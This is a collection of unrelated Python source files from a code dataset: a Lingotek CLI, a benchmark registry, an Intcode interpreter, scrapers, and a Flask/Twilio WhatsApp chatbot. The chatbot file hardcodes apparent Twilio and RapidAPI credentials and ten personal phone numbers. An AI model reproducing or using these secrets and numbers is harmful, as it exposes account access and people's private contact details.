logger.info(\"Usage: ltk rm [OPTIONS] FILE_NAMES...\")\n return\n\n if len(file_names) > 0:\n file_names = remove_powershell_formatting(file_names)\n\n action.rm_action(file_names, **kwargs)\n except (UninitializedError, ResourceNotFound, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(short_help=\"Move file or directory at the specified location to a specified destination folder.\")\n@click.argument('source_path', type=click.Path(exists=True), required=True, nargs=-1)\n@click.argument('destination_path', required=True, nargs=1)\ndef mv(source_path, destination_path):\n \"\"\"\n Moves specified local doc to a specified destination directory, moving both the file itself and file location stored in the local database.\n If SOURCE_PATH is a directory, all added files in the directory will be moved.\n \"\"\"\n try:\n # action = actions.Action(os.getcwd())\n add = add_action.AddAction(os.getcwd())\n action = move_action.MoveAction(add, os.getcwd())\n init_logger(action.path)\n\n source_path = remove_powershell_formatting(source_path)\n #print(\"Source path \" + str(source_path))\n destination_path = remove_powershell_formatting(destination_path)\n #print(\"Destination path \"+str(destination_path))\n\n action.mv_action(source_path, destination_path)\n except(UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(name='import', short_help=\"Import docs from Lingotek\")\n@click.option('-a', '--all', 'import_all', flag_value=True, help='Import all documents from Lingotek Cloud')\n@click.option('-f', '--force', flag_value=True, help='Overwrites existing documents without prompt')\n@click.option('-p', '--path', type=click.Path(exists=True), help='Import documents to a specified path')\n@click.option('-t', '--track', flag_value=True, help='Automatically add the imported documents to local tracking if they were not already being tracked. Will not track cancelled documents. Note: They will be added without extra options (no srx id, no download folder, etc.)')\n@click.option('-c', '--no-cancel', flag_value=True, help='Don\\'t include documents that have been cancelled.')\ndef import_command(import_all, force, path, track, no_cancel):\n \"\"\"\n Import documents from Lingotek Cloud, by default downloading to the project's root folder\n \"\"\"\n # todo import should show all documents\n # add a force option so can import all force -- overwrites all existing documents without prompting\n # check if doc id\n # if exist, prompt for overwrite\n # else automatically re-name\n # possibly have to patch title in Lingotek Cloud?\n try:\n # action = actions.Action(os.getcwd())\n action = import_action.ImportAction(os.getcwd())\n init_logger(action.path)\n\n if path != None:\n path = remove_powershell_formatting(path)\n\n action.import_action(import_all, force, path, track, no_cancel)\n except(UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help=\"Cleans up the associations between local documents and documents in Lingotek\")\n@click.option('-a', '--all', 'dis_all', flag_value=True, help='Removes all associations between local and remote documents and cancels those documents')\n@click.argument('file_paths', required=False, nargs=-1)\n@click.option('-f', '--force', flag_value=True, help='Deletes locally tracked documents that have been cancelled or no longer exist in Lingotek')\ndef clean(force, dis_all, file_paths):\n \"\"\"\n Cleans up the associations between local documents and documents in Lingotek.\n By default, removes documents from local tracking that have been cancelled or no longer exist locally or in the Lingotek Cloud.\n Enter file or directory names to cancel those documents and remove local associations of specific files or directories.\n \"\"\"\n try:\n action = clean_action.CleanAction(os.getcwd())\n init_logger(action.path)\n\n if len(file_paths) > 0:\n file_paths = remove_powershell_formatting(file_paths)\n\n action.clean_action(force, dis_all, file_paths)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(short_help=\"Copies added source folders for each locale\")\n@click.argument('folders', required=False, nargs=-1)\n@click.option('-c', '--copy_root', flag_value=True, help='Copies the root source folder as a subfolder inside the locale folder, even if there is only one source folder being cloned.')\ndef clone(folders, copy_root):\n \"\"\"\n Copies the folder structure of added folders or specified folders\n for each target locale as specified in config.\n Folders are added to the locale folder specified if one has been specified,\n or by default a new folder will be created with the name of the locale. If\n only one root folder is being cloned, then the locale folder is used\n (instead of creating a new folder inside of the locale folder).\n \"\"\"\n try:\n action = clone_action.CloneAction(os.getcwd())\n init_logger(action.path)\n if isinstance(folders,str):\n folders = [folders]\n\n if len(folders) > 0:\n folders = remove_powershell_formatting(folders)\n\n action.clone_action(folders, copy_root)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(short_help=\"Watches local and remote files\")\n# @click.option('-p', '--path', type=click.Path(exists=True), multiple=True, help='Specify a folder to watch. Use option multiple times to specify multiple folders.')\n@click.option('--ignore', multiple=True, help='Specify types of files to ignore. For multiple types, specify this flag multiple times. For example, to ignore pdf and html files, use \"ltk watch --ignore .pdf --ignore .html\"')\n@click.option('--auto', 'delimiter', help='Automatically detects locale from the file name; specify locale delimiter')\n@click.option('-t', '--timeout', type=click.INT, default=60,\n help='The amount of time watch will sleep between polls, in seconds. Defaults to 1 minute')\n@click.option('-n','--no_folders', flag_value=True, help='Ignore files added to watch folders and only watch documents that have already been added.')\n@click.option('-f','--force_poll', flag_value=True, help='Force API calls to Lingotek system at every poll for every document')\ndef watch(ignore, delimiter, timeout, no_folders, force_poll): # path, ignore, delimiter, timeout, no_folders):\n \"\"\"\n Watches local files added by ltk, and sends a PATCH when a document is changed.\n Also watches remote files, and automatically downloads finished translations.\n Automatically adds documents that are added to the watchfolder. Note: The add is performed without extra options (no srx id, no download folder, etc.)\n \"\"\"\n try:\n action = WatchAction(os.getcwd(), timeout)\n init_logger(action.path)\n action.watch_action(ignore, delimiter, no_folders, force_poll) #path, ignore, delimiter, no_folders)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n# Filters (Split into files, see http://bit.ly/2jArTRm)\n\n@click.group(short_help=\"List, create, update, or delete Lingotek filters\")\ndef filters():\n pass\n\n@filters.command(name='add',short_help=\"Create a filter on Lingotek.\")\n@click.argument('filename')\n@click.option('-t', '--type', 'filter_type', type=click.Choice(['FPRM','SRX','ITS']), help=\"The filter type being added. Must be one of the following: FPRM, SRX, ITS. When not explicitly specified, the file extension is used to attempt to detect the type.\")\ndef filter_add(filename, filter_type):\n \"\"\"Create filter on Lingotek.\"\"\"\n try:\n action = filters_action.FiltersAction(os.getcwd())\n init_logger(action.path)\n action.filter_add_action(filename, filter_type)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@filters.command(name='save',short_help=\"Update filter on Lingotek.\")\n@click.argument('filter_id')\n@click.argument('filename')\ndef filter_add(filter_id, filename):\n \"\"\"Update filter on Lingotek.\"\"\"\n try:\n action = filters_action.FiltersAction(os.getcwd())\n init_logger(action.path)\n action.filter_save_action(filter_id, filename)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@filters.command(name=\"get\", short_help=\"Retrieve filter contents from Lingotek.\")\n@click.argument('filter_id')\n@click.argument('filename', required=False)\n@click.option('--info','info',flag_value=True, help=\"Retrieve filter info only.\")\n@click.option('--overwrite',flag_value=True, help=\"Overwrite local file when it already exists.\")\ndef filter_get(filter_id, filename, info, overwrite):\n \"\"\"Retrieve the filter specified by FILTER_ID from Lingotek and store it in the current working directly as the title (or as as the optional_filename when specified) of the filter\"\"\"\n try:\n action = filters_action.FiltersAction(os.getcwd())\n init_logger(action.path)\n if info == True:\n action.filter_info_action(filter_id)\n else:\n action.filter_get_action(filter_id, filename, overwrite)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@filters.command(name=\"list\")\ndef filter_list():\n \"\"\"List default and custom filters.\"\"\"\n try:\n action = filters_action.FiltersAction(os.getcwd())\n init_logger(action.path)\n action.filter_list_action()\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@filters.command(name=\"rm\", short_help=\"Remove filter from Lingotek.\")\n@click.argument('filter_id')\ndef filter_rm(filter_id):\n \"\"\"Remove the filter specified by FILTER_ID.\"\"\"\n try:\n action = filters_action.FiltersAction(os.getcwd())\n init_logger(action.path)\n action.filter_rm_action(filter_id)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\nltk.add_command(filters)\n\n@click.group(short_help=\"Manages reference material attached to documents.\")\ndef reference():\n pass\n\n@reference.command(name='add', short_help=\"Uploads reference material and attaches it to the specified document.\")\n@click.argument('filename')\n@click.option('-i', '--id', 'doc_id', flag_value=True, help=\"Adds reference material to the specified document ID instead of the specified filename.\")\ndef reference_add(filename, doc_id):\n \"\"\"Adds reference material to a document on Lingotek.\"\"\"\n try:\n action = reference_action.ReferenceAction(os.getcwd())\n init_logger(action.path)\n action.reference_add_action(filename, doc_id)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@reference.command(name='list', short_help=\"Lists the reference material that is currently attached to the specified document.\")\n@click.argument('filename')\n@click.option('-i', '--id', 'doc_id', flag_value=True, help=\"Lists reference material attached to the specified document ID instead of the specified filename.\")\ndef reference_list(filename, doc_id):\n \"\"\"Lists reference material attached to a document on Lingotek.\"\"\"\n try:\n action = reference_action.ReferenceAction(os.getcwd())\n init_logger(action.path)\n action.reference_list_action(filename, doc_id)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@reference.command(name='get', short_help=\"Downloads reference material that is currently attached to the specified document.\")\n@click.argument('filename')\n@click.option('-i', '--id', 'doc_id', flag_value=True, help=\"Downloads reference material attached to the specified document ID instead of the specified filename.\")\n@click.option('-a', '--all', 'get_all', flag_value=True, help=\"Skips the prompt and downloads all the reference material that is attached to the document.\")\n@click.option('-p', '--path', type=click.Path(exists=True), help='Download reference material to a specified path')\ndef reference_get(filename, doc_id, get_all, path):\n \"\"\"Downloads reference material attached to a document on Lingotek. Defaults to downloading them to the root of the project\"\"\"\n try:\n action = reference_action.ReferenceAction(os.getcwd())\n init_logger(action.path)\n action.reference_download_action(filename, doc_id, get_all, path)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@reference.command(name='rm', short_help=\"Removes reference material that is currently attached to the specified document\")\n@click.argument('filename')\n@click.option('-i', '--id', 'doc_id', flag_value=True, help=\"Removes reference material from the specified document ID instead of the specified filename.\")\n@click.option('-a', '--all', 'remove_all', flag_value=True, help=\"Skips the prompt and removes all the reference material from the document.\")\ndef reference_remove(filename, doc_id, remove_all):\n \"\"\"Deletes reference material attached to a document on Lingotek.\"\"\"\n try:\n action = reference_action.ReferenceAction(os.getcwd())\n init_logger(action.path)\n action.reference_remove_action(filename, doc_id, remove_all)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\nltk.add_command(reference)\n\nif __name__ == '__main__':\n ltk()\n","sub_path":"python2/ltk/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":45053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"599957484","text":"import TBC.benchmarks.kvs.RandomRW.RandomRW as RandomRW\nimport TBC.benchmarks.sql.RandomTransactions.RandomTransactions as RandomTransactions\nimport TBC.benchmarks.sql.sysbench.sysbench as sysbench\n\n_benchmarks = {\n 'RandomRW': {\n 'preload': RandomRW.get_preload,\n 'load': RandomRW.get_load,\n 'benchmark': RandomRW.get_benchmark,\n 'default_config': 'TBC/benchmarks/kvs/RandomRW/config.yaml'\n },\n 'RandomTransactions': {\n 'preload': RandomTransactions.get_preload,\n 'load': RandomTransactions.get_load,\n 'postload': RandomTransactions.get_postload,\n 'benchmark': RandomTransactions.get_benchmark,\n 'default_config': 'TBC/benchmarks/sql/RandomTransactions/config.yaml'\n },\n 'sysbench': {\n 'preload': sysbench.get_preload,\n 'load': sysbench.get_load,\n 'postload': sysbench.get_postload,\n 'benchmark': sysbench.get_benchmark,\n 'default_config': 'TBC/benchmarks/sql/sysbench/config.yaml'\n }\n}\n\ndef _noop(*args, **kwargs):\n \"\"\"\n No Op funciton, acts as a placeholder\n \"\"\"\n return\n\ndef get_benchmark_preload(benchmark, config):\n \"\"\"\n Get the function that should be called prior to loading (for single threaded use)\n :param benchmark:\n :param config:\n :return:\n \"\"\"\n if 'preload' in _benchmarks[benchmark]:\n return _benchmarks[benchmark]['preload'](config)\n else:\n return _noop\n\n\ndef get_benchmark_load(benchmark, config):\n \"\"\"\n Get the function that loads the database (for multithreaded use)\n :param benchmark: the benchmark name\n :return: a load function. This function accepts a config argument.\n \"\"\"\n if 'load' in _benchmarks[benchmark]:\n return _benchmarks[benchmark]['load'](config)\n return _noop\n\n\ndef get_benchmark_postload(benchmark, config):\n \"\"\"\n Get the function that should be called after loading (for single threaded use)\n :param benchmark:\n :param config:\n :return:\n \"\"\"\n if 'postload' in _benchmarks[benchmark]:\n return _benchmarks[benchmark]['postload'](config)\n else:\n return _noop\n\n\ndef get_benchmark(benchmark, config):\n \"\"\"\n Return a benchmark\n :param benchmark: the benchmark name\n :return: a benchmark Task (or a function that returns one)\n \"\"\"\n return _benchmarks[benchmark]['benchmark'](config)\n\n\ndef get_default_config(benchmark):\n \"\"\"\n Get the file path of the default configuration file for the benchmark\n :param benchmark: the benchmark name\n :return: the file path of the default configuration file\n \"\"\"\n return _benchmarks[benchmark]['default_config']\n","sub_path":"TBC/benchmarks/benchmark_locator.py","file_name":"benchmark_locator.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91665940","text":"\"\"\"\nCreated on Tue Mar 24 21:44:39 2020\n\n@author: MahaKAAL\n\"\"\"\n\n\n\nimport requests\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nfrom chatterbot import ChatBot\nfrom chatterbot.comparisons import levenshtein_distance, jaccard_similarity, sentiment_comparison, synset_distance\nfrom chatterbot.response_selection import get_first_response\nfrom flask import Flask, request\nfrom twilio.twiml.messaging_response import MessagingResponse\nfrom twilio.rest import Client\nimport datetime\nfrom concurrent.futures import ThreadPoolExecutor\nimport pytz\nimport json\n\n\n\nexecutor = ThreadPoolExecutor(3)\nexecuted=False\nwished=False\ngn=False\ngm=False\nbot = ChatBot(\n\t'Tomato',\n\tstorage_adapter='chatterbot.storage.SQLStorageAdapter',\n\tdatabase_uri='sqlite:///update_corpus_database.sqlite3',\n\n\tpreprocessors=[\n\t\t'chatterbot.preprocessors.clean_whitespace'\n\t],\n\n\tlogic_adapters=[\n\t\t{\n\t\t\t\"import_path\": \"chatterbot.logic.BestMatch\",\n\t\t\t\"statement_comparison_function\": levenshtein_distance,\n\t\t\t\"statement_comparison_function\": synset_distance,\n\t\t\t\"response_selection_method\": get_first_response,\n\t\t\t'default_response': 'I am sorry, but I do not understand.',\n\t\t\t'maximum_similarity_threshold': 0.50\n\t\t},\n{\n\t\t\t\"import_path\": \"chatterbot.logic.BestMatch\",\n\t\t\t\"statement_comparison_function\": jaccard_similarity,\n\t\t\t\"statement_comparison_function\": levenshtein_distance,\n\t\t\t\"statement_comparison_function\": sentiment_comparison,\n\t\t\t\"response_selection_method\": get_first_response,\n\t\t\t'default_response': 'I am sorry, but I do not understand.',\n\t\t\t'maximum_similarity_threshold': 0.50\n\t\t},\n\t\t{\n\n\t\t\t\"import_path\": \"chatterbot.logic.MathematicalEvaluation\",\n\t\t}\n\t],)\n\n\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef hello():\n\treturn \"Hello folks! This is a new api of chatbot, Tomato. Just request a post method at /sms and get your reply.\"\n\n\n\n@app.route(\"/sms\", methods=['POST'])\ndef sms_reply():\n\tmsg = request.form.get('Body')\n\tprint(msg)\n\treply=''\n\tif(msg!=None):\n\t\tif(('corona' in msg.lower().split())and(('stats' in msg.lower().split())or ('statistics' in msg.lower().split()) or ('news' in msg.lower().split()) or ('updates' in msg.lower().split()) or ('update' in msg.lower().split()) or ('statistic' in msg.lower().split()) or ('stat' in msg.lower().split()))):\n\t\t\tmsg_body = show_all()\n\t\t\tfirst_part_body = msg_body[0][:1600]\n\t\t\tsecond_part_body = msg_body[0][1600:]\n\t\t\tthird_part_body = msg_body[1]\n\t\t\tif('world' in msg.lower().split()):\n\t\t\t\treply=first_part_body\n\t\t\telse:\n\t\t\t\treply=third_part_body\n\t\telif('joke' in msg.lower().split() or 'jokes' in msg.lower().split()):\n\t\t\turl = \"https://jokeapi.p.rapidapi.com/category/Any\"\n\t\t\tquerystring = {\"format\": \"json\"}\n\t\t\theaders = {\n\t\t\t\t'x-rapidapi-host': \"jokeapi.p.rapidapi.com\",\n\t\t\t\t'x-rapidapi-key': \"e31b809e20mshf1eb77a4f8b2f7fp1aa244jsnf67574dab9be\"\n\t\t\t}\n\t\t\tjoke_response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\t\t\tprint(joke_response.text)\n\t\t\tjoke_response_json=json.loads(joke_response.text)\n\t\t\tif(joke_response_json.get('joke')==None):\n\t\t\t\treply=joke_response_json.get('setup')+\"\\n\"+joke_response_json.get('delivery')\n\t\t\telse:\n\t\t\t\treply=joke_response_json.get('joke')\n\t\telif('schedule' in msg.lower().split() and 'all' in msg.lower().split()):\n\t\t\trequests.get(\"http://tomatotalk.herokuapp.com/jobs\")\n\t\t\treply=\"Alarms & Wishes are all set.\"\n\t\telse:\n\t\t\treply=bot.get_response(msg)\n\t\t\tprint(reply)\n\tresp = MessagingResponse()\n\tresp.message(str(reply))\n\treturn str(resp)\n\n\n@app.route('/jobs')\ndef run_jobs():\n executor.submit(alarms)\n executor.submit(wishesGm)\n executor.submit(wishesGn)\n return 'Alarms are launched in background!'\n\n\ndef wishesGm():\n\tglobal gm\n\tif(gm==False):\n\t\tgm=True\n\t\ttz = pytz.timezone('Asia/Kolkata')\n\t\tdt = datetime.datetime\n\t\tyour_now = dt.now(tz)\n\t\twish='Good Morning'\n\t\tif(your_now.hour>6 or (your_now.hour==6 and your_now.minute>30)):\n\t\t\tsleeping_time=(29-your_now.hour)*3600+(29-your_now.minute)*60+(59-your_now.second)\n\t\telse:\n\t\t\tsleeping_time = (6 - your_now.hour) * 3600 + (29 - your_now.minute) * 60 + (59 - your_now.second)\n\t\tprint(\"Wishes are scheduled\")\n\t\tprint('gm '+str(sleeping_time))\n\t\tsleep(sleeping_time)\n\t\tcreateMessage(wish)\n\t\tprint(\"Already done Wishing.\")\n\t\tgm=False\n\n\ndef wishesGn():\n\tglobal gn\n\tif(gn==False):\n\t\tgn=True\n\t\ttz = pytz.timezone('Asia/Kolkata')\n\t\tdt = datetime.datetime\n\t\tyour_now = dt.now(tz)\n\t\twish='Good Night'\n\t\tif(your_now.hour>22 or (your_now.hour==22 and your_now.minute>=30)):\n\t\t\tsleeping_time=(45-your_now.hour)*3600+(29-your_now.minute)*60+(59-your_now.second)\n\t\telse:\n\t\t\tsleeping_time = (22 - your_now.hour) * 3600 + (29 - your_now.minute) * 60 + (59 - your_now.second)\n\t\tprint(\"Wishes are scheduled\")\n\t\tprint('gn ' + str(sleeping_time))\n\t\tsleep(sleeping_time)\n\t\tcreateMessage(wish)\n\t\tprint(\"Already done Wishing.\")\n\t\tgn=False\n\ndef alarms():\n\tglobal executed\n\tif(executed==False):\n\t\texecuted = True\n\t\tdt=datetime.datetime\n\t\ttz = pytz.timezone('Asia/Kolkata')\n\t\tyour_now = dt.now(tz)\n\t\tif(your_now.hour>6 or (your_now.hour==6 and your_now.minute>30)):\n\t\t\tsleeping_time=(29-your_now.hour)*3600+(29-your_now.minute)*60+(59-your_now.second)\n\t\telse:\n\t\t\tsleeping_time=(6-your_now.hour)*3600+(29-your_now.minute)*60+(59-your_now.second)\n\t\tprint(\"Corona Alarms are scheduled!\")\n\t\tprint('alarms ', str(sleeping_time))\n\t\tsleep(sleeping_time)\n\t\tmsg_body = show_all()\n\t\tfirst_part_body=msg_body[0][:len(msg_body[0]) // 2]\n\t\tcreateMessage(first_part_body)\n\t\tsecond_part_body=msg_body[0][len(msg_body[0]) // 2:]\n\t\tcreateMessage(second_part_body)\n\t\tthird_part_body=msg_body[1]\n\t\tcreateMessage(third_part_body)\n\t\tprint(\"Updates Posted\")\n\t\texecuted=False\n\ndef download_world_data():\n\ta = requests.get(\"https://www.worldometers.info/coronavirus/\")\n\tgot_data = a.text\n\tsoup = BeautifulSoup(got_data, 'html.parser')\n\tdata = soup.prettify()\n\tpage_title = str(soup.title)\n\tpage_title = page_title[7:-22]\n\n\tworld_data = []\n\tfor a in soup.find_all('table', attrs={'id': 'main_table_countries_today'}):\n\t\tfor b in a.find_all('tr'):\n\t\t\tworld_data.append(b.text.strip().split('\\n'))\n\treturn world_data\n\ndef download_ind_data():\n\ta1 = requests.get(\"https://www.mohfw.gov.in/\")\n\tgot_data2 = a1.text\n\tsoup2 = BeautifulSoup(got_data2, 'html.parser')\n\tdata2 = soup2.prettify()\n\tpage_title2 = \"CoronaVirus Update (Live): India State-wise\"\n\n\tdownload_data = []\n\tfor x in soup2.find_all('div', attrs={'id': 'cases'}):\n\t\tfor y in (x.find_all('div', attrs={'class': 'table-responsive'})):\n\t\t\tfor z in (y.find_all('tr')):\n\t\t\t\tdownload_data.append(z.text.strip().split('\\n'))\n\treturn download_data\n\ndef format_world_data():\n\tworld_data = download_world_data()\n\tobjects = []\n\tmydict = {}\n\tfor x in range(1, len(world_data) - 1):\n\t\tfor y in range(5):\n\t\t\tif (world_data[x][y] == '' or world_data[x][y] == ' '):\n\t\t\t\tmydict[world_data[0][y]] = '0'\n\t\t\telse:\n\t\t\t\t# 6 print(world_data[x][y])\n\t\t\t\tmydict[world_data[0][y]] = world_data[x][y].strip()\n\n\t\tobjects.append(mydict)\n\t\tif (mydict['Country,Other'] == \"India\"):\n\t\t\tbreak\n\t\tmydict = {}\n\treturn objects\n\n\ndef format_ind_data():\n\tdownload_data = download_ind_data()\n\tobjects = []\n\tmydict = {}\n\tfor x in range(1, len(download_data) - 1):\n\t\tfor y in range(1, 6):\n\t\t\tif (download_data[x][y] == '' or download_data[x][y] == ' '):\n\t\t\t\tmydict[download_data[0][y]] = '0'\n\t\t\telse:\n\t\t\t\t# print(download_data[x][y])\n\t\t\t\tmydict[download_data[0][y]] = download_data[x][y].strip()\n\n\t\tobjects.append(mydict)\n\t\tmydict = {}\n\treturn objects\n\n\ndef show_world_data():\n\tvalues_got1 = format_world_data()\n\treturning = \"\"\n\tfor x in values_got1:\n\t\treturning += (x.get('Country,Other') + \"\\n\" + \"Total Cases: \" + x.get(\n\t\t\t'TotalCases') + \"\\n\" + 'Total Deaths: ' + x.get('TotalDeaths') + \"\\n\\n\")\n\treturn returning\n\n\ndef show_ind_data():\n\tvalues_got2 = format_ind_data()\n\treturning = \"\"\n\tfor x in values_got2:\n\t\treturning += (x.get('Name of State / UT') + \"\\n\" + \"Total Cases: \" + x.get(\n\t\t\t'Total Confirmed cases *') + \"\\n\" + 'Total Deaths: ' + x.get('Death') + \"\\n\\n\")\n\treturn returning\n\n\ndef show_all():\n\ta = requests.get(\"https://www.worldometers.info/coronavirus/\")\n\tgot_data = a.text\n\tsoup = BeautifulSoup(got_data, 'html.parser')\n\tdata = soup.prettify()\n\tpage_title = str(soup.title)\n\tpage_title = page_title[7:-22]\n\tpage_title2 = \"CoronaVirus Update (Live): India State-wise\"\n\tmain_data1=page_title + \"\\n\\n\" + show_world_data()\n\tmain_data2=page_title2 + \"\\n\\n\" + show_ind_data() + \"\\n\\nStay Safe At Home.\"\n\treturn ([main_data1,main_data2])\n\ndef createMessage(msg_body):\n\tpnlist=['+919635270177','+917908483889','+919679995500','+918436858480','+917001291866','+919732248317','+918609016486','+918579926004','+919434362217','+919851509075']\n\taccount_sid = 'AC40f1ae77f284fb9522f629b5454cb991'\n\tauth_token = 'a6aa50dc31dc4e954c5dd2c9ef7f8ff9'\n\tclient = Client(account_sid, auth_token)\n\tfor x in pnlist:\n\t\tmessage = client.messages.create(from_='whatsapp:+14155238886',body=msg_body,to='whatsapp:'+x)\n\nif __name__ == \"__main__\":\n\tapp.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"10994611","text":"# 7. Given a string, compute recursively (no loops) a new string where all the\n# lowercase 'x' chars have been changed to 'y' chars.\n\ndef x_to_y(string):\n first_letter = string[0]\n if len(string) == 1:\n if string == \"x\":\n string = \"y\"\n return string\n else:\n if first_letter == \"x\":\n first_letter = \"y\"\n return first_letter + x_to_y(string[1:len(string)])\n\nprint(x_to_y(\"xevlkjhcyyyljhlihxxx\"))\n","sub_path":"08a recursive_python/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91628119","text":"class Computer:\n def __init__(self, memory, inputs):\n self.memory = memory + 10000*[0]\n self.ip = 0\n self.inputs = inputs\n self.outputs = []\n self.finished = False\n self.relative_base = 0\n def run(self):\n while not self.step():\n pass\n return self.outputs\n \n def step(self):\n code = self.memory[self.ip]\n if code % 100 == 99:\n self.finished = True\n return True\n elif code % 100 == 1:\n self.add(code)\n elif code % 100 == 2:\n self.multiply(code)\n elif code % 100 == 3:\n self.read_input(code)\n elif code % 100 == 4:\n self.output(code)\n elif code % 100 == 5:\n self.jmp(code)\n elif code % 100 == 6:\n self.jmpe(code)\n elif code % 100 == 7:\n self.lt(code)\n elif code % 100 == 8:\n self.equals(code)\n elif code % 100 == 9:\n self.adjust_relbase(code)\n else:\n raise Exception(\"Invalid opcode\")\n\n def get_value(self, address, mode):\n if mode == 0:\n return self.memory[self.memory[address]]\n elif mode == 1:\n return self.memory[address]\n elif mode == 2:\n return self.memory[self.memory[address]+self.relative_base]\n else:\n raise Exception(\"Invalid parameter mode\")\n\n def set_value(self, value, address, mode):\n if mode == 0:\n self.memory[self.memory[address]] = value\n elif mode == 2:\n self.memory[self.memory[address]+self.relative_base] = value\n else:\n raise Exception(\"Invalid parameter mode for setting\")\n\n \n def add(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:05}\"[:-2]))))\n sum_ = 0\n for i in range(2):\n sum_ += self.get_value(self.ip+i+1, params_mode[i])\n self.set_value(sum_, self.ip+3, params_mode[2])\n self.ip += 4\n\n def multiply(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:05}\"[:-2]))))\n mul = 1\n for i in range(2):\n mul *= self.get_value(self.ip+i+1, params_mode[i])\n self.set_value(mul, self.ip+3, params_mode[2])\n self.ip += 4\n\n def read_input(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:03}\"[:-2]))))\n x = self.inputs.pop(0)\n self.set_value(x, self.ip+1, params_mode[0])\n self.ip += 2\n\n def output(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:03}\"[:-2]))))\n out = self.get_value(self.ip+1, params_mode[0])\n self.outputs.append(out)\n self.ip += 2\n \n def jmp(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:04}\"[:-2]))))\n test_address = [0, 0]\n for i in range(2):\n test_address[i] = self.get_value(self.ip+i+1, params_mode[i])\n if test_address[0]:\n self.ip = test_address[1]\n else:\n self.ip += 3\n\n def jmpe(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:04}\"[:-2]))))\n test_address = [0, 0]\n for i in range(2):\n test_address[i] = self.get_value(self.ip+i+1, params_mode[i])\n if test_address[0]==0:\n self.ip = test_address[1]\n else:\n self.ip += 3\n \n def lt(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:05}\"[:-2]))))\n operands = [0,0]\n for i in range(2):\n operands[i] = self.get_value(self.ip+i+1, params_mode[i])\n out = 1 if operands[0] < operands[1] else 0\n self.set_value(out, self.ip+3, params_mode[2])\n self.ip += 4\n\n def equals(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:05}\"[:-2]))))\n operands = [0,0]\n for i in range(2):\n operands[i] = self.get_value(self.ip+i+1, params_mode[i])\n out = 1 if operands[0] == operands[1] else 0\n self.set_value(out, self.ip+3, params_mode[2])\n self.ip += 4\n\n def adjust_relbase(self, code):\n params_mode = list(map(int,reversed(list(f\"{code:03}\"[:-2]))))\n value = self.get_value(self.ip+1, params_mode[0])\n self.relative_base += value\n self.ip += 2\n\n","sub_path":"Day-9/pysol/computer.py","file_name":"computer.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"177337526","text":"import urllib\nfrom BeautifulSoup import *\nimport re\n\nurl = 'http://quote.eastmoney.com/stocklist.html'\n\nhtml = urllib.urlopen(url).read().decode('gbk')\nsoup=BeautifulSoup(html)\ntags = soup('a')\ntags_ = tags[80:4066]\nlist=[]\ni=0\n\nwhile i < len(tags_):\n list.append(re.findall('\\((.*)\\)',str(tags_[i])))\n i=i+1\n\n#stockurl = 'http://quote.eastmoney.com/sh'+list[2000][0]+'.html'\nstockurl = 'http://table.finance.yahoo.com/table.csv?s=601857.ss'\nm=0\n\n'''\nwhile m < 10:\n stockurl = stockurl +'sh' + list[m][0]\n m=m+1\n if m == 10:\n break\n stockurl = stockurl + ','\n\nwhile m < 1000:\n stockurl = stockurl + list[m][0]\n m=m+1\n if m == 1000:\n break\n stockurl = stockurl + ','\n\nwhile m < 1000:\n stockurl = stockurl + list[m][0]\n m=m+1\n if m == 1000:\n break\n stockurl = stockurl + ','\n''' \nhtml = urllib.urlopen(stockurl).read().decode('gbk')\nsoup = BeautifulSoup(html)\n","sub_path":"stock-number.py","file_name":"stock-number.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"232481195","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nfrom torch.autograd import Variable\n\n\nclass LSTMClassifier(nn.Module):\n\n def __init__(self, embedding_dim, hidden_dim, vocab_size, label_size, batch_size):\n super(LSTMClassifier, self).__init__()\n self.hidden_dim = hidden_dim\n self.batch_size = batch_size\n self.word_embeddings = nn.Embedding(vocab_size, embedding_dim)\n 